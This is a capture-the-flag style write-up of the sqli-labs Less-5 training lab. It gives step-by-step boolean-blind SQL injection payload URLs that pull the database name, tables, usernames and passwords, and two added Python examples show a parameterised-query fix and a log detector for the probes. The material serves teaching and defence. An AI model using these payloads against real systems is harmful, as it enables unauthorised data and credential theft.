Sqli-labs-master Fifth Less-5 Double Query-single: Way One

Source: Internet
Author: User
Tags: ord

Since Less-3 and Less-4 are roughly the same as the first two levels, I will not write them up.

Next comes the first way of solving the fifth level.



1. Target site:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1

When id=1 is passed, the page shows the prompt "You are in".



2. Find the injection point:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1'

returns an error. When this URL is requested, the page shows a database error, and the arrow in the screenshot marks its cause: the `1'` was carried into the database query as part of the SQL text, so an injection point exists.
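The behaviour in steps 1 and 2 comes from the request parameter being spliced into the SQL text. The following is an added example, not code from the sqli-labs page: it models such a lookup against an in-memory SQLite database with constructed rows, and contrasts it with the parameterised form. The table contents, the probe strings and the assumption that the lab concatenates `id` into its query are all constructed here; SQLite is used in place of MySQL, so the trailing comment is `--` rather than `#`.

```python
"""Added example, not code from the sqli-labs page: a small model of a
Less-5 style lookup, built on an in-memory SQLite database with constructed
rows, contrasting string concatenation with a parameterised query."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the lab's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "pw-one"), (2, "bob", "pw-two")],  # constructed rows
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, raw_id: str) -> str:
    """Vulnerable pattern (assumed to mirror how the lab builds its query):
    the request parameter is spliced straight into the SQL text, so a quote
    in the input ends the literal and the rest is parsed as SQL."""
    sql = f"SELECT username FROM users WHERE id='{raw_id}' LIMIT 1"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        # The lab echoes the driver's message to the page; that message is the
        # signal the write-up uses in step 2 to confirm the injection point.
        return f"error: {exc}"
    return "You are in" if row else "no row"


def lookup_safe(conn: sqlite3.Connection, raw_id: str) -> str:
    """Hardened form: the value is bound as a parameter and never becomes SQL."""
    sql = "SELECT username FROM users WHERE id=? LIMIT 1"
    row = conn.execute(sql, (raw_id,)).fetchone()
    return "You are in" if row else "no row"


# Constructed probes. The first is the write-up's step-2 test (a lone quote);
# the other two form a true/false pair like its step-4 length checks. SQLite
# uses "--" for a trailing comment where the write-up's MySQL payloads use "#".
PROBE_QUOTE = "1'"
PROBE_TRUE = "1' and length('security')=8 --"
PROBE_FALSE = "1' and length('security')=9 --"


def oracle_visible(conn: sqlite3.Connection, lookup) -> bool:
    """True when the true/false probe pair produces different responses,
    i.e. the endpoint leaks a boolean oracle through the given lookup."""
    return lookup(conn, PROBE_TRUE) != lookup(conn, PROBE_FALSE)


if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_unsafe, lookup_safe):
        print(fn.__name__, "|", fn(db, "1"), "|", fn(db, PROBE_QUOTE),
              "| oracle:", oracle_visible(db, fn))
```

With `lookup_unsafe` the lone quote produces a driver error and the true/false pair produces two different pages, which is exactly the oracle every later step of this write-up relies on; with `lookup_safe` both probes are compared as plain text against the integer column, return "no row", and the oracle disappears.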


3. Check the version information (`%23` is the URL-encoded `#`, which comments out the rest of the original query):

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(version(),1)=5%23

returns normally.

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(version(),1)=4%23

returns an error, so the database version is 5.0.



4. Determine the length of the database name:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length(database())=7%23

returns an error.

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length(database())=8%23

returns normally.

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and length(database())=9%23

returns an error, so the database name is 8 characters long.


5. Guess the database name (one character at a time, starting with the first):

(1) Guess the first character

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),1)>'a'%23

returns normally.

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),1)>'z'%23

returns an error, so the first character lies between a and z.

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),1)>'s'%23

returns normally, so the first character is s.

(2) Guess the second character

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),2)>'sa'%23

returns normally.

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),2)>'sz'%23

returns an error, so the second character lies between a and z.

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and left(database(),2)>'se'%23

returns normally, so the second character is e.

Continue in the same way until all 8 characters are known: the database name is security.


6. Guess the tables in the database (security):

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit a,1),b,1))>n%23

Description: a is the table index, counted from 0; b is the character position within the table name; n is the decimal ASCII value being compared against.



7. Guess the usernames:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from S.M limit A,1),B,1))=N%23

where S is the database name; M is the table name; A is the user index; B is the character position; N is the decimal number of the ASCII code.

8. Guess the username and password:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from S.M order by id limit A,1),B,1))=N%23

where S is the database name; M is the table name; A is the user index; B is the character position; N is the decimal number of the ASCII code.

Example (the character position, 1 here, is the second argument of mid()): http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and ord(mid((select ifnull(cast(password as char),0x20) from security.users order by id limit 0,1),1,1))=68%23
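Every payload in steps 3 to 8 shares the same few building blocks and arrives as a long run of near-identical requests that differ only in the compared value, which is what a defender should look for in web-server logs. The following is an added example, not part of the write-up: a small detector that URL-decodes the request path, matches those building blocks, and counts hits per client. The log lines are constructed samples in combined-log layout; the pattern list and the burst threshold are choices made here, not anything the page prescribes.

```python
"""Added example, not from the write-up: a small detector for the
boolean-blind probe shapes used on this page, run over constructed
access-log lines in Apache/Nginx combined-log layout."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Building blocks of the comparison payloads in steps 3 to 8 of the write-up.
PROBE_PATTERNS = {
    "left(version(": re.compile(r"\bleft\s*\(\s*version\s*\(", re.I),
    "length(database(": re.compile(r"\blength\s*\(\s*database\s*\(", re.I),
    "left(database(": re.compile(r"\bleft\s*\(\s*database\s*\(", re.I),
    "ascii(substr(": re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),
    "ord(mid(": re.compile(r"\bord\s*\(\s*mid\s*\(", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: one benign lab request, three probes from one
# client that mirror steps 3, 4 and 6, and an unrelated benign search.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /sqli-labs-master/Less-5/?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /sqli-labs-master/Less-5/?id=1%27%20and%20left(version(),1)=5%23 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /sqli-labs-master/Less-5/?id=1%27%20and%20length(database())=8%23 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:42 +0000] "GET /sqli-labs-master/Less-5/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>100%23 HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=length+of+database HTTP/1.1" 200 2048',
]


def classify(line: str):
    """Parse one line and return the probe patterns its decoded path matches
    (None when the line is not in the expected layout)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path"))
    hits = [name for name, rx in PROBE_PATTERNS.items() if rx.search(decoded)]
    return {"ip": m.group("ip"), "path": decoded,
            "status": m.group("status"), "hits": hits}


def scan(lines, burst_threshold: int = 3):
    """Return (flagged records, clients at or above burst_threshold hits).
    A blind injection is a long run of near-identical requests that differ
    only in the compared value, so the per-client count is the stronger signal."""
    flagged = []
    per_ip = Counter()
    for line in lines:
        rec = classify(line)
        if rec and rec["hits"]:
            flagged.append(rec)
            per_ip[rec["ip"]] += 1
    noisy = {ip for ip, n in per_ip.items() if n >= burst_threshold}
    return flagged, noisy


if __name__ == "__main__":
    hits, clients = scan(SAMPLE_LOG)
    for rec in hits:
        print(rec["ip"], rec["hits"], rec["path"])
    print("clients with a probe burst:", sorted(clients))
```

The per-request match is deliberately narrow (function name followed by an opening parenthesis) so that ordinary text such as "length of database" in a search query does not fire; the per-client counter is what separates a single odd request from the hundreds of comparisons a character-by-character extraction needs.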


Appendix:

substr(): substring extraction function.

ord(): returns the ASCII code value of a character. Example: ord('a') gives the ordinal of a in the ASCII table, which is 97; ord('b') gives the ordinal of b, which is 98.

mid(): string extraction function.

Syntax: mid(string, start position, number of characters to take)

Example: with b6 = '123456789abcdef', mid(b6,1,13) gives '123456789abcd'.

ifnull(expr1, expr2): if expr1 is not NULL, ifnull() returns expr1; otherwise it returns expr2.

cast() function (reference blog: http://www.studyofnet.com/news/109.html):

(1) The argument to CAST() is an expression containing the source value and the target data type, separated by the AS keyword. The following example converts the text string '12' to an integer:

SELECT CAST('12' AS int)

(2) The return value is the integer 12. What happens if you try to convert a string that represents a decimal to an integer?

SELECT CAST('12.5' AS int)

(3) Neither CAST() nor CONVERT() performs rounding or truncation. Since 12.5 cannot be represented by the int data type, this call produces an error.
